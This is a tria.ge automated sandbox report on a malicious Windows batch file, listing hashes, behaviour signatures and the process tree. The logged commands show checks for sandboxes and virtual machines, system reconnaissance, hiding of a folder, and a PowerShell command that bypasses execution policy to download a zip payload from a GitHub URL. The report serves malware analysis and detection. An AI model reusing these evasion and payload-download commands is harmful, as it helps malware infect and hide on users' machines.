Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/01/2025, 17:56

General

  • Target

    .bat

  • Size

    35KB

  • MD5

    e0f14d8b4e040e347ac4c68fa65ab34d

  • SHA1

    7792151bebcc851456faf92760e66e63fd9db8b8

  • SHA256

    7944c6a800e3956afceb244e4b58d6368858879cef8d225c0c870646e29405d5

  • SHA512

    cacaaef3f5184ed6a0c2f7655114dabeee7bf5e163d65a1758ba209ceeac97c5d79210fc0c6d1c98ff2ac9c1664ddbbde00f3587af1cc9983d0047a3c3205991

  • SSDEEP

    768:x+R8e3f87iaNQeCOarasWNMb5yMqX/9MFRb:+3UdNQAarapE

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2832
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c hostname
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\system32\HOSTNAME.EXE
          hostname
          3⤵
            PID:2716
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Khbthjfa "
          2⤵
            PID:2940
          • C:\Windows\system32\findstr.exe
            findstr /r /i ".*tria.*\.ge"
            2⤵
              PID:2576
            • C:\Windows\system32\netsh.exe
              netsh interface show interface
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:2116
            • C:\Windows\system32\findstr.exe
              findstr /i "Triage"
              2⤵
                PID:2804
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic computersystem get model
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2836
              • C:\Windows\system32\findstr.exe
                findstr /i "VirtualBox VMware Hyper-V KVM"
                2⤵
                  PID:2596
                • C:\Windows\system32\systeminfo.exe
                  systeminfo
                  2⤵
                  • Gathers system information
                  PID:2580
                • C:\Windows\system32\findstr.exe
                  findstr /i "VirtualBox VMware Hyper-V"
                  2⤵
                    PID:2588
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic bios get serialnumber
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2964
                  • C:\Windows\system32\findstr.exe
                    findstr /i "VBOX VMWARE"
                    2⤵
                      PID:2960
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic nic get name
                      2⤵
                        PID:524
                      • C:\Windows\system32\findstr.exe
                        findstr /i "Virtual"
                        2⤵
                          PID:2252
                        • C:\Windows\system32\attrib.exe
                          attrib +h "C:\Users\Admin\AppData\Local\Anon" /s /d
                          2⤵
                          • Views/modifies file attributes
                          PID:2540
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -ExecutionPolicy Bypass -Command "try { Invoke-WebRequest 'https://github.com/H8bs0lfVZviVo3nSSXLzzzz/ksawdarsffsff/raw/refs/heads/main/jsxbjJkH.zip' -OutFile 'jsxbjJkH.zip' } catch { Write-Error 'Download failed with error: $_'; exit 1 }"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1692

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/1692-5-0x000000001B780000-0x000000001BA62000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/1692-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

                        Filesize

                        32KB